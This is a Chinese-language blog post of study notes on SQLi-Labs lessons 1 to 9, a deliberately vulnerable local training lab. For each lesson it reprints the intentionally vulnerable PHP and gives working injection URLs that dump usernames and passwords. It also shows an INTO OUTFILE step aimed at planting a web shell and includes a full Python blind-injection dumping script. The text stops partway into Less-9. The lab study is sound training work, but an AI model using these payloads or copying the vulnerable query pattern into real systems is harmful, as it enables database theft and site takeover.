antelope_

SQLi-Labs 学习笔记（Less 1-10）

点击打开链接

http://blog.csdn.net/u012763794/article/details/51207833

http://blog.csdn.net/u012763794/article/details/51361152

http://blog.csdn.net/u012763794/article/details/51457142

Less-1 基于错误的 - get 单引号 - 字符型注入

①先打开网页查看 Welcome Dhakkan

②查看源代码 index.php :

[php]  view plain 
       copy
"-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  
"http://www.w3.org/1999/xhtml">  
  
"Content-Type" content="text/html; charset=utf-8" />  
Less-1 **Error Based- String**  
  
  
"#000000">  
" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome   "#FF0000"> Dhakkan 
  
"3" color="#FFFF00">  
  
  
//including the Mysql connect parameters.  
include("../sql-connections/sql-connect.php");  
error_reporting(0);  
// take the variables   
if(isset($_GET['id']))  
{  
$id=$_GET['id'];  
//logging the connection parameters to a file for analysis.  
$fp=fopen('result.txt','a');  
fwrite($fp,'ID:'.$id."\n");  
fclose($fp);  
  
// connectivity   
  
  
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";  
$result=mysql_query($sql);  
$row = mysql_fetch_array($result);  
  
    if($row)  
    {  
    echo "";  
    echo 'Your Login name:'. $row['username'];  
    echo "
";  
    echo 'Your Password:' .$row['password'];  
    echo "";  
    }  
    else   
    {  
    echo '';  
    print_r(mysql_error());  
    echo "";    
    }  
}  
    else { echo "Please input the ID as parameter with numeric value";}  
  
?>  
 

"../images/Less-1.jpg" />

③可以看到页面中显示：

[plain]  view plain 
       copy
Please input the ID as parameter with numeric value  

按它说的做，那我们就在URL后面输入：

[plain]  view plain 
       copy
http://localhost/sqli-labs-master/Less-1/?id=1  

看来我们得到了登录名：Dumb，以及密码：Dumb，那么为什么会显示出来呢？我们来看下index.php中的代码：

[php]  view plain 
       copy
if(isset($_GET['id']))                  //判断id的值时候有被设置  
{  
$id=$_GET['id'];                    //取出id值  
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";    //构建sql语句，漏洞所在  
.....  
.....  
$result=mysql_query($sql);              //然后查询，并返回结果  
$row = mysql_fetch_array($result);  
if($row)  
{  
    echo "";  
    echo 'Your Login name:'. $row['username'];  
    echo "
";  
    echo 'Your Password:' .$row['password'];  
    echo "";  
    }  
    else   
    {  
    echo '';  
    print_r(mysql_error());  
    echo "";    
    }  
}  
    else { echo "Please input the ID as parameter with numeric value";}  
  
?>  

这样一来就明白了为什么会有这样的结果，当然如果你输入不同的id值就会返回不同的结果，实际查询的语句是：

[plain]  view plain 
       copy
SELECT * FROM users WHERE id='1' LIMIT 0,1;  

注意：这里的$id是被单引号包起来的，我可以可以通过 ' 来验证，输入URL：

[plain]  view plain 
       copy
http://localhost/sqli-labs-master/Less-1/?id=1'  

以下还有两个注入可以成功执行：

[plain]  view plain 
       copy
http://localhost/sqli-labs-master/Less-1/?id=1' or'1'='1  
http://localhost/sqli-labs-master/Less-1/?id=1' or 1=1 --+  

对应的mysql执行语句：

[plain]  view plain 
      copy
SELECT * FROM users WHERE id='1' or '1'='1' LIMIT 0,1  
SELECT * FROM users WHERE id='' or 1=1 --+' LIMIT 0,1  

接下来我们利用 order by 来判断users表中有几列，输入如下：

[plain]  view plain 
       copy
http://localhost/sqli-labs-master/Less-1/?id=1' order by 1 %23  

注意：%23 是指 # 的编码

提示的信息可以使我们确定没有第4列，接下来使用联合语句 union 来查询，输入：

[plain]  view plain 
      copy
http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,3 %23  

注意：细心的朋友可能发现我把1改成-1，原因是当用id=1的时候执行的结果只有一条记录，这是因为在 index.php 中并没有循环取出数据。

解决方法是：让第一行查询的结果是空集（即union左边的select子句查询结果为空），那么我们union右边的查询结果自然就成为了第一行，就打印在网页上了，这个id他一般传的是数字，而且一般都是从1开始自增的，我们可以把id值设为非正数（负数或0），浮点数，字符型或字符串都行。

可以看到只有第2列和第3列的结果显示在页面上，我们只有 2，3可以用，接下来我们就利用 2，3来查询数据库的信息，需要用到的函数有：

concat_ws（）：从数据库里取N个字段，然后组合到一起用符号分割显示，第一个参数剩余参数间的分隔符

char（）：将十进制ASCII码转化成字符

user（）：返回当前数据库连接使用的用户

database（）：返回当前数据库连接使用的数据库

version（）：返回当前数据库的版本

构建如下Sql语句：

[plain]  view plain 
       copy
http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,(concat_ws(char(32,58,32),user(),database(),version())) %23  

注意：这里的32表示 [空格]，58表示 [：] ，执行

知道数据库名了，接下来就是拆解表了。

首先说一下mysql的数据库information_schema，他是系统数据库，安装完就有，记录是当前数据库的数据库，表，列，用户权限等信息，下面说一下常用的几个表

SCHEMATA表：储存mysql所有数据库的基本信息，包括数据库名，编码类型路径等，show databases的结果取之此表。

TABLES表：储存mysql中的表信息，（当然也有数据库名这一列，这样才能找到哪个数据库有哪些表嘛）包括这个表是基本表还是系统表，数据库的引擎是什么，表有多少行，创建时间，最后更新时间等。show tables from schemaname的结果取之此表

COLUMNS表：提供了表中的列信息，（当然也有数据库名和表名称这两列）详细表述了某张表的所有列以及每个列的信息，包括该列是那个表中的第几列，列的数据类型，列的编码类型，列的权限，猎德注释等。是show columns from schemaname.tablename的结果取之此表。

注意，查询information_schema中的信息时，使用where语句，那个值不能直接用英文，要用单引号包裹着，当然用其十六进制表示也可以，数值类型的就不用单引号了，这对过滤单引号应该有指导意义。

security的十六进制转换是：0x7365637572697479

16进制转换地址：http://www.bejson.com/convert/ox2str/

那么，接下来。构建 Sql 语句：

[plain]  view plain 
      copy
http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 %23  

只返回一个table，原因很简单，还是循环问题。那么我们可以使用limit来依次列举：

[plain]  view plain 
       copy
http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1 %23  

不断的改变，limit的第一个参数，就可以一次列举出来，不过太麻烦了，我们直接使用 group_concat函数，该函数返回一个字符串结果，该结果由分组中的值连接组合而成，那么构建 sql 语句：

[plain]  view plain 
       copy
http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(char(32),username,char(32)),group_concat(char(32),password,char(32)) from users--+  

Less-2 基于错误的 - get - 数字型

① 先打开网页查看 Welcome Dhakkan

②查看源代码 index.php :

[php]  view plain 
       copy
"-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  
"http://www.w3.org/1999/xhtml">  
  
"Content-Type" content="text/html; charset=utf-8" />  
Less-2 **Error Based- Intiger**  
  
  
"#000000">  
  
  
  
  
" margin-top:60px;color:#FFF; font-size:23px; text-align:center">Welcome   "#FF0000"> Dhakkan 
  
"3" color="#FFFF00">  
  
  
//including the Mysql connect parameters.  
include("../sql-connections/sql-connect.php");  
error_reporting(0);  
// take the variables  
if(isset($_GET['id']))  
{  
$id=$_GET['id'];  
//logging the connection parameters to a file for analysis.  
$fp=fopen('result.txt','a');  
fwrite($fp,'ID:'.$id."\n");  
fclose($fp);  
  
  
// connectivity   
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";  
$result=mysql_query($sql);  
$row = mysql_fetch_array($result);  
  
    if($row)  
    {  
    echo "";  
    echo 'Your Login name:'. $row['username'];  
    echo "
";  
    echo 'Your Password:' .$row['password'];  
    echo "";  
    }  
    else   
    {  
    echo '';  
    print_r(mysql_error());  
    echo "";    
    }  
}  
    else  
        {     
        echo "Please input the ID as parameter with numeric value";  
        }  
  
?>  
  
  
 

"../images/Less-2.jpg" />

③可以看到页面中显示：

[plain]  view plain 
       copy
Please input the ID as parameter with numeric value   

按它说的做，那我们就在URL后面输入：

这样我们就得到了用户名和密码，在 index.php 中唯一的区别就是 $id 没有用单引号包住了，这是因为sql对于数字型的数据可以不加单引号。当然这也使得注入更加容易了，没什么好说的，构建sql语句：

[plain]  view plain 
       copy
http://localhost/sqli-labs-master/Less-1/?id=-1 union select 1,group_concat(char(32),username,char(32),group_concat(char(32),password,char(32)) from users--+  

Less-3基于错误的 - GET单引号变形字符型注入

① 先打开网页查看 Welcome Dhakkan

②查看源代码：

[php]  view plain 
      copy
"-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  
"http://www.w3.org/1999/xhtml">  
  
"Content-Type" content="text/html; charset=utf-8" />  
Less-3 Error Based- String (with Twist)   
  
  
  
"#000000">  
  
" margin-top:60px;color:#FFF; font-size:23px; text-align:center">Welcome   "#FF0000"> Dhakkan 
  
"3" color="#FFFF00">  
  
  
//including the Mysql connect parameters.  
include("../sql-connections/sql-connect.php");  
error_reporting(0);  
// take the variables  
if(isset($_GET['id']))  
{  
$id=$_GET['id'];  
//logging the connection parameters to a file for analysis.  
$fp=fopen('result.txt','a');  
fwrite($fp,'ID:'.$id."\n");  
fclose($fp);  
  
// connectivity   
  
  
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";  
$result=mysql_query($sql);  
$row = mysql_fetch_array($result);  
  
    if($row)  
    {  
    echo "";  
    echo 'Your Login name:'. $row['username'];  
    echo "
";  
    echo 'Your Password:' .$row['password'];  
    echo "";  
    }  
    else   
    {  
    echo '';  
    print_r(mysql_error());  
    echo "";    
    }  
}  
    else { echo "Please input the ID as parameter with numeric value";}  
  
?>  
  
  
 

"../images/Less-3.jpg" />

③可以看到页面中显示：

[plain]  view plain 
      copy
Please input the ID as parameter with numeric value  

按它说的做，那我们就在URL后面输入：

一样的画面，可以发现在 index.php 中的 $id 改成了 ('$id') 了，当然，也很容易验证：

首先看到near和at之间的字符串，直接将左右的引号去掉，那么就得到'-1'') LIMIT 0,1，')是多出来的，因此可以确认这是单引号注入的变形。输入如下sql语句：

[plain]  view plain 
      copy
http://localhost/sqli-labs-master/Less-3/?id=1')--+  

正常显示了吧，基本上就没什么区别了，构建的sql语句如下：

[plain]  view plain 
      copy
http://localhost/sqli-labs-master/Less-3/?id=-1') union select 1,group_concat(char(32),username,char(32),group_concat(char(32),password,char(32)) from users--+  

Less-4基于错误的GET双引号字符型注入

① 先打开网页查看 Welcome Dhakkan

②查看源代码：

[php]  view plain 
        copy
"-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  
"http://www.w3.org/1999/xhtml">  
  
"Content-Type" content="text/html; charset=utf-8" />  
Less-4 Error Based- DoubleQuotes String  
  
  
"#000000">  
" margin-top:60px;color:#FFF; font-size:23px; text-align:center">Welcome   "#FF0000"> Dhakkan 
  
"3" color="#FFFF00">  
  
  
//including the Mysql connect parameters.  
include("../sql-connections/sql-connect.php");  
error_reporting(0);  
// take the variables  
if(isset($_GET['id']))  
{  
$id=$_GET['id'];  
//logging the connection parameters to a file for analysis.  
$fp=fopen('result.txt','a');  
fwrite($fp,'ID:'.$id."\n");  
fclose($fp);  
  
// connectivity   
  
$id = '"' . $id . '"';  
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";  
$result=mysql_query($sql);  
$row = mysql_fetch_array($result);  
  
    if($row)  
    {  
    echo "";  
    echo 'Your Login name:'. $row['username'];  
    echo "
";  
    echo 'Your Password:' .$row['password'];  
    echo "";  
    }  
    else   
    {  
    echo '';  
    print_r(mysql_error());  
    echo "";    
    }  
}  
    else { echo "Please input the ID as parameter with numeric value";}  
  
?>  
  
 

"../images/Less-4.jpg" />

③可以看到页面中显示：

[plain]  view plain 
        copy
Please input the ID as parameter with numeric value  

按它说的做，那我们就在URL后面输入：

在URL后面加上单引号，发现没有报错，这是为什么呢？因为php中的双引号可以包含单引号 (" $id' ")

解决方法也很简单，直接加上双引号：

将 near 和 at 之间的单引号去点得到，''1'')，很显然使用 (" $id' ")这种形式，解决方法也很简单，构建的sql语句：

[plain]  view plain 
        copy
http://localhost/sqli-labs-master/Less-4/?id=-1") union select 1,group_concat(char(32),username,char(23)),group_concat(char(32),password,char(32)) from users--+  

Less-5双注入GET单引号字符型注入

① 先打开网页查看 Welcome Dhakkan

②查看源代码：

[php]  view plain 
            copy
"-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  
"http://www.w3.org/1999/xhtml">  
  
"Content-Type" content="text/html; charset=utf-8" />  
Less-5 Double Query- Single Quotes- String  

"#000000">

" margin-top:60px;color:#FFF; font-size:23px; text-align:center">Welcome "#FF0000"> Dhakkan

"3" color="#FFFF00">

//including the Mysql connect parameters.

include("../sql-connections/sql-connect.php");

error_reporting(0);

// take the variables

if(isset($_GET['id']))

{

$id=$_GET['id'];

//logging the connection parameters to a file for analysis.

$fp=fopen('result.txt','a');

fwrite($fp,'ID:'.$id."\n");

fclose($fp);

// connectivity

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

$result=mysql_query($sql);

$row = mysql_fetch_array($result);

if($row)

{

echo '';

echo 'You are in...........';

echo "
";

echo "";

}

else

{

echo '';

print_r(mysql_error());

echo "
";

echo '';

}

else { echo "Please input the ID as parameter with numeric value";}

"../images/Less-5.jpg" />

③可以看到页面中显示：

[plain]  view plain 
           copy
Please input the ID as parameter with numeric value  

按它说的做，那我们就在URL后面输入：

提示：You are in.......，没有像之前那样正常输出用户名和密码，怎么回事呢？看下 index.php 中的代码：

[plain]  view plain 
        copy
if($row)  
{  
  echo '';   
  echo 'You are in...........';  
  echo "
";  
    echo "";  
 }  

怪不得没有，因为根本就没有输出 $row 这个查询结果，由于是双注入，百度了一下，总结如下：

双查询注入顾名思义形式上是两个嵌套的查询，即select ...(select ...)，里面的那个select被称为子查询，他的执行顺序也是先执行子查询，然后再执行外面的select，双注入主要涉及到了几个sql函数：

rand()随机函数，返回0~1之间的某个值

floor(a)取整函数，返回小于等于a，且值最接近a的一个整数

count()聚合函数也称作计数函数，返回查询对象的总数

group by cluase分组语句，按照cluase对查询结果分组

如果还是不懂可以看此链接： http://www.2cto.com/article/201303/192718.html

双注入的原理总的来说就是，当一个聚合函数后面出现group分组语句时，会将查询的一部分结果以报错的形式返回，他有一个固定的公式。那么开始构建sql语句：

[plain]  view plain 
       copy
http://localhost/sqli-labs-master/Less-5/?id=-1' union select count(*),2,concat('*',(select database()),'*',floor(rand()*2))as a from information_schema.tables group by a--+  

获取到数据库名后再用同样的方法获取表名：

[plain]  view plain 
      copy
http://localhost/sqli-labs-master/Less-5/?id=-1' union select count(*),2,concat('*',(select group_concat(table_name) from information_schema.tables where table_schema='security'),'*',floor(rand()*2))as a from information_schema.tables group by a--+  

接下里查询用户信息，构建语句如下：

[plain]  view plain 
       copy
http://localhost/sqli-labs-master/Less-5/?id=-1' union select count(*),2,concat('*',(select concat_ws(char(32,44,32),id,username,password) from users limit 1,1),'*',floor(rand()*2))as a from information_schema.tables group by a--+  

通过改变 limit 的值就可以遍历用户信息了。

Less-6双注入GET双引号字符型注入

① 先打开网页查看 Welcome Dhakkan

②查看源代码：

[php]  view plain 
        copy
"-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  
"http://www.w3.org/1999/xhtml">  
  
"Content-Type" content="text/html; charset=utf-8" />  
Less-6 Double Query- Double Quotes- String  
  
  
"#000000">  
" margin-top:60px;color:#FFF; font-size:23px; text-align:center">Welcome   "#FF0000"> Dhakkan 
  
"3" color="#FFFF00">  
  
  
//including the Mysql connect parameters.  
include("../sql-connections/sql-connect.php");  
error_reporting(0);  
// take the variables  
if(isset($_GET['id']))  
{  
$id=$_GET['id'];  
//logging the connection parameters to a file for analysis.  
$fp=fopen('result.txt','a');  
fwrite($fp,'ID:'.$id."\n");  
fclose($fp);  
  
// connectivity   
  
$id = '"'.$id.'"';  
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";  
$result=mysql_query($sql);  
$row = mysql_fetch_array($result);  
  
    if($row)  
    {  
    echo '';     
    echo 'You are in...........';  
    echo "
";  
    echo "";  
    }  
    else   
    {  
      
    echo '';  
    print_r(mysql_error());  
    echo "
";      
    echo '';    
      
    }  
}  
    else { echo "Please input the ID as parameter with numeric value";}  
  
?>  
 

"../images/Less-6.jpg" />

③可以看到页面中显示：

[plain]  view plain 
      copy
Please input the ID as parameter with numeric value  

按它说的做，那我们就在URL后面输入：

还是没输出什么有价值的信息，试一试让它报错：

看来是双引号注入了，类似上面的，构建语句：

[plain]  view plain 
       copy
http://localhost/sqli-labs-master/Less-6/?id=-1" union select count(*),2,concat('*',(select concat_ws(char(32,44,32),id,username,password) from users limit 0,1),'*',floor(rand()*2))as a from information_schema.tables group by a--+  

Less-7 导出文件GET字符型注

① 先打开网页查看 Welcome Dhakkan

②查看源代码：

[plain]  view plain 
        copy
  
  
  
  
Less-7 Dump into Outfile  
  
  
  
  
  
Welcome    Dhakkan 
  
  
  
  
//including the Mysql connect parameters.  
include("../sql-connections/sql-connect.php");  
error_reporting(0);  
// take the variables  
if(isset($_GET['id']))  
{  
$id=$_GET['id'];  
//logging the connection parameters to a file for analysis.  
$fp=fopen('result.txt','a');  
fwrite($fp,'ID:'.$id."\n");  
fclose($fp);  
  
// connectivity   
  
  
$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";  
$result=mysql_query($sql);  
$row = mysql_fetch_array($result);  
  
    if($row)  
    {  
    echo '';     
    echo 'You are in.... Use outfile......';  
    echo "
";  
    echo "";  
    }  
    else   
    {  
    echo '';  
    echo 'You have an error in your SQL syntax';  
    //print_r(mysql_error());  
    echo "";    
    }  
}  
    else { echo "Please input the ID as parameter with numeric value";}  
  
?>  
 

③可以看到页面中显示：

[plain]  view plain 
         copy
Please input the ID as parameter with numeric value  

按它说的做，那我们就在URL后面输入：

弹出 Use outfile，尝试之前的方法行不通了，他把报错做了处理统一返回“You have an error in your SQL syntax”，明显的，他也给出了提示use outfile，outfile的固定结构是：select A into outfile B，这里的B通常是一个文件路径，A可以是文本内容（小马），也可以是数据库信息，于是这里就有三种思路：

第一种，构造select * from users into outfile "数据库导入导出数据的目录"，先来判断一下我们是否是最高权限

显示正常，说明的确是最高权限。

提示语法错误，并且在C盘也没有找到数据文件，百度了一下，原因如下：

Mysql数据库需要在指定的目录下进行数据的导出， secure_file_priv这个参数用来限制数据导入和导出操作的效果，例如执行LOAD DATA、SELECT ... INTO OUTFILE语句和LOAD_FILE()函数。这些操作需要用户具有FILE权限。
如果这个参数为空，这个变量没有效果；
如果这个参数设为一个目录名，MySQL服务只允许在这个目录中执行文件的导入和导出操作。这个目录必须存在，MySQL服务不会创建它；
如果这个参数为NULL，MySQL服务会禁止导入和导出操作。这个参数在MySQL 5.7.6版本引入。

如果有出现 secure_file_priv 路径有问题的，可以参考： http://blog.csdn.net/man_to_home/article/details/54947518

虽然提示语法错误，不过c盘上已经有了data.txt这个文件了：

第二种，将一句话木马写入到文件，用菜刀拿下网站：

首先介绍两个可以说是函数，还是变量的东西

@@datadir 读取数据库路径
@@basedir MYSQL 获取安装路径

构建如下语句：

[plain]  view plain 
          copy
http://localhost/sqli-labs-master/Less-3/?id=1')) union select 1,@@basedir,@@datadir--+  

得到如下路径：

最后构建如下语句：

[plain]  view plain 
          copy
http://localhost/sqli-labs-master/Less-7/?id=-1')) union select 1,'2','' into outfile 'C:/AppServ/www/data.txt' %23  

然后菜刀连接，这里不演示了，不会的话可以百度一下。

Less-8 布尔型单引号GET盲注

① 先打开网页查看 Welcome Dhakkan

②查看源代码：

[plain]  view plain 
             copy
  
  
  
  
Less-8 Blind- Boolian- Single Quotes- String  
  
  
  
Welcome    Dhakkan 
  
  
  
  
//including the Mysql connect parameters.  
include("../sql-connections/sql-connect.php");  
error_reporting(0);  
// take the variables  
if(isset($_GET['id']))  
{  
$id=$_GET['id'];  
//logging the connection parameters to a file for analysis.  
$fp=fopen('result.txt','a');  
fwrite($fp,'ID:'.$id."\n");  
fclose($fp);  
  
// connectivity   
  
  
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";  
$result=mysql_query($sql);  
$row = mysql_fetch_array($result);  
  
    if($row)  
    {  
    echo '';     
    echo 'You are in...........';  
    echo "
";  
        echo "";  
    }  
    else   
    {  
      
    echo '';  
    //echo 'You are in...........';  
    //print_r(mysql_error());  
    //echo "You have an error in your SQL syntax";  
    echo "
";      
    echo '';    
      
    }  
}  
    else { echo "Please input the ID as parameter with numeric value";}  
  
?>  
  
 

③可以看到页面中显示：

[plain]  view plain 
              copy
Please input the ID as parameter with numeric value  

按它说的做，那我们就在URL后面输入：

正常输入返回“You are in......”，尝试单引号却什么都没返回，看了下源码就是这样处理的，点题盲注，盲注主要分为bool型和时间性，通常涉及到这几个函数:

length(str)：返回字符串str的长度

substr(str,pos,len)：将str从pos位置开始截取len长度的字符返回，需要注意的是这里pos的是从1开始的

mid(str,pos,len)：和substr()类似

ascii(str)：返回字符串str最左边的acsii码（即首字母的acsii码）

ord()：同上，返回acsii码

left(str,len)：对字符串str左截取len长度

right(str,len)：对字符串str右截取len长度

if(a,b,c)：条件判断，如果a为true，返回b，否则返回c

盲注有个固定式：and ascii(substr(A,1,1))>B，或者and if( ascii(substr(A,1,1))>B ,1,0)，这里的A通常是一个select语句，B则是字符或数字的ascii码，他们的中心思想都是通过substr等截取函数以二分法的形式查询逐个匹配想要的信息，这个过程通常都很耗时，所以建议直接写个盲注脚本来跑

下面是盲注匹配的一个例子，我们来匹配数据库名，在之前的实验中已知数据库名是security，下面的sql语句是用来匹配数据库名的第一个字母

字母s的ascii码是115，所以他大于114，结果为true，页面显示正常，依次类推即可

当然也可以用脚本来跑，从别人那挖来的：

[python]  view plain 
              copy
# -*-coding:utf-8-*-  
   
"""  
@version:   
@author: giantbranch  
@file: code_inject.py  
@time: 2016/5/1   
"""  
   
import urllib2  
import urllib  
   
   
success_str = "You are in"  
getTable = "users"  
   
index = "0"  
url = "http://localhost/sqli-labs/Less-8/?id=1"  
database = "database()"  
selectDB = "select database()"  
selectTable = "select table_name from information_schema.tables where table_schema='%s' limit %d,1"  
   
   
asciiPayload = "' and ascii(substr((%s),%d,1))>=%d #"  
lengthPayload = "' and length(%s)>=%d #"  
selectTableCountPayload = "'and (select count(table_name) from information_schema.tables where table_schema='%s')>=%d #"  
   
selectTableNameLengthPayloadfront = "'and (select length(table_name) from information_schema.tables where table_schema='%s' limit "  
selectTableNameLengthPayloadbehind = ",1)>=%d #"  
   
   
# 发送请求，根据页面的返回的判断长度的猜测结果  
# string:猜测的字符串 payload:使用的payload  length：猜测的长度  
def getLengthResult(payload, string, length):  
    finalUrl = url + urllib.quote(payload % (string, length))  
    res = urllib2.urlopen(finalUrl)  
    if success_str in res.read():  
        return True  
    else:  
        return False  
   
# 发送请求，根据页面的返回的判断猜测的字符是否正确  
# payload:使用的payload    string:猜测的字符串   pos：猜测字符串的位置    ascii：猜测的ascii  
def getResult(payload, string, pos, ascii):  
    finalUrl = url + urllib.quote(payload % (string, pos, ascii))  
    res = urllib2.urlopen(finalUrl)  
    if success_str in res.read():  
        return True  
    else:  
        return False  
   
# 注入  
def inject():  
    # 猜数据库长度  
    lengthOfDBName = getLengthOfString(lengthPayload, database)  
    print "length of DBname: " + str(lengthOfDBName)  
    # 获取数据库名称  
    DBname = getName(asciiPayload, selectDB, lengthOfDBName)  
       
    print "current database:" + DBname  
   
    # 获取数据库中的表的个数  
    # print selectTableCountPayload  
    tableCount = getLengthOfString(selectTableCountPayload, DBname)  
    print "count of talbe:" + str(tableCount)  
   
    # 获取数据库中的表  
    for i in xrange(0,tableCount):  
        # 第几个表  
        num = str(i)  
        # 获取当前这个表的长度  
        selectTableNameLengthPayload = selectTableNameLengthPayloadfront + num + selectTableNameLengthPayloadbehind  
        tableNameLength = getLengthOfString(selectTableNameLengthPayload, DBname)  
        print "current table length:" + str(tableNameLength)  
        # 获取当前这个表的名字  
        selectTableName = selectTable%(DBname, i)  
        tableName = getName(asciiPayload, selectTableName ,tableNameLength)  
        print tableName  
   
   
    selectColumnCountPayload = "'and (select count(column_name) from information_schema.columns where table_schema='"+ DBname +"' and table_name='%s')>=%d #"  
    # print selectColumnCountPayload  
    # 获取指定表的列的数量  
    columnCount = getLengthOfString(selectColumnCountPayload, getTable)  
    print "table:" + getTable + " --count of column:" + str(columnCount)  
   
    # 获取该表有多少行数据  
    dataCountPayload = "'and (select count(*) from %s)>=%d #"  
    dataCount = getLengthOfString(dataCountPayload, getTable)  
    print "table:" + getTable + " --count of data: " + str(dataCount)  
   
    data = []  
    # 获取指定表中的列  
    for i in xrange(0,columnCount):  
        # 获取该列名字长度  
        selectColumnNameLengthPayload = "'and (select length(column_name) from information_schema.columns where table_schema='"+ DBname +"' and table_name='%s' limit "+ str(i) +",1)>=%d #"  
        # print selectColumnNameLengthPayload  
        columnNameLength = getLengthOfString(selectColumnNameLengthPayload, getTable)  
        print "current column length:" + str(columnNameLength)  
        # 获取该列的名字  
        selectColumn = "select column_name from information_schema.columns where table_schema='"+ DBname +"' and table_name='%s' limit %d,1"  
        selectColumnName = selectColumn%(getTable, i)  
        # print selectColumnName  
        columnName = getName(asciiPayload, selectColumnName ,columnNameLength)  
        print columnName  
   
        tmpData = []  
        tmpData.append(columnName)  
        # 获取该表的数据  
        for j in xrange(0,dataCount):  
            columnDataLengthPayload = "'and (select length("+ columnName +") from %s limit " + str(j) + ",1)>=%d #"  
            # print columnDataLengthPayload  
            columnDataLength = getLengthOfString(columnDataLengthPayload, getTable)  
            # print columnDataLength  
            selectData = "select " + columnName + " from users limit " + str(j) + ",1"  
            columnData = getName(asciiPayload, selectData, columnDataLength)  
            # print columnData  
            tmpData.append(columnData)  
       
        data.append(tmpData)  
   
    # print data      
    # 格式化输出数据  
    # 输出列名  
    tmp = ""  
    for i in xrange(0,len(data)):  
        tmp += data[i][0] + "   "  
    print tmp  
    # 输出具体数据  
    for j in xrange(1,dataCount+1):  
        tmp = ""  
        for i in xrange(0,len(data)):  
            tmp += data[i][j] + "   "  
        print tmp  
       
# 获取字符串的长度            
def getLengthOfString(payload, string):  
    # 猜长度  
    lengthLeft = 0  
    lengthRigth = 0  
    guess = 10  
    # 确定长度上限，每次增加5  
    while 1:  
        # 如果长度大于guess  
        if getLengthResult(payload, string, guess) == True:  
            # 猜测值增加5  
            guess = guess + 5     
        else:  
            lengthRigth = guess  
            break  
    # print "lengthRigth: " + str(lengthRigth)  
    # 二分法查长度  
    mid = (lengthLeft + lengthRigth) / 2  
    while lengthLeft < lengthRigth - 1:  
        # 如果长度大于等于mid   
        if getLengthResult(payload, string, mid) == True:  
            # 更新长度的左边界为mid  
            lengthLeft = mid  
        else:   
        # 否则就是长度小于mid  
            # 更新长度的右边界为mid  
            lengthRigth = mid  
        # 更新中值  
        mid = (lengthLeft + lengthRigth) / 2          
        # print lengthLeft, lengthRigth  
    # 因为lengthLeft当长度大于等于mid时更新为mid，而lengthRigth是当长度小于mid时更新为mid  
    # 所以长度区间：大于等于 lengthLeft，小于lengthRigth  
    # 而循环条件是 lengthLeft < lengthRigth - 1，退出循环，lengthLeft就是所求长度  
    # 如循环到最后一步 lengthLeft = 8， lengthRigth = 9时，循环退出，区间为8<=length<9,length就肯定等于8  
    return lengthLeft  
   
# 获取名称  
def getName(payload, string, lengthOfString):  
    # 32是空格，是第一个可显示的字符，127是delete，最后一个字符  
    tmp = ''  
    for i in xrange(1,lengthOfString+1):  
        left = 32   
        right = 127  
        mid = (left + right) / 2  
        while left < right - 1:  
            # 如果该字符串的第i个字符的ascii码大于等于mid  
            if getResult(payload, string, i, mid) == True:  
                # 则更新左边界  
                left = mid  
                mid = (left + right) / 2  
            else:  
            # 否则该字符串的第i个字符的ascii码小于mid  
                # 则更新右边界  
                right = mid  
            # 更新中值  
            mid = (left + right) / 2  
        tmp += chr(left)  
        # print tmp  
    return tmp    
           
   
def main():  
    inject()  
main()  

Less-9基于时间的GET单引号盲注

① 先打开网页查看 Welcome Dhakkan

②查看源代码：

[php]  view plain 
                   copy
"-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  
"http://www.w3.org/1999/xhtml">  
  
"Content-Type" content="text/html; charset=utf-8" />  
Less-9 Blind- Time based- Single Quotes- String  
  
  
"#000000">  
" margin-top:60px;color:#FFF; font-size:23px; text-align:center">Welcome   "#FF0000"> Dhakkan 
  
"3" color="#FFFF00">  
  
  
//including the Mysql connect parameters.  
include("../sql-connections/sql-connect.php");  
error_reporting(0);  
  
// take the variables  
if(isset($_GET['id']))  
{  
$id=$_GET['id'];  
//logging the connection parameters to a file for analysis.  
$fp=fopen('result.txt','a');  
fwrite($fp,'ID:'.$id."\n");  
fclose($fp);  
  
// connectivity   
  
  
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";  
$result=mysql_query($sql);  
$row = mysql_fetch_array($result);  
  
    if($row)  
    {  
    echo '';     
    echo 'You are in...........';  
    echo "
";  
        echo "";  
    }  
    else   
    {  
      
    echo '';  
    echo 'You are in...........';  
    //print_r(mysql_error());  
    //echo "You have an error in your SQL syntax";  
    echo "
";      
    echo '';    
      
    }  
}  
    else { echo "Please input the ID as parameter with numeric value";}  
  
?>  
 

"../images/Less-9.jpg" />

③可以看到页面中显示：

[plain]  view plain 
                 copy
Please input the ID as parameter with numeric value  

按它说的做，那我们就在URL后面输入：

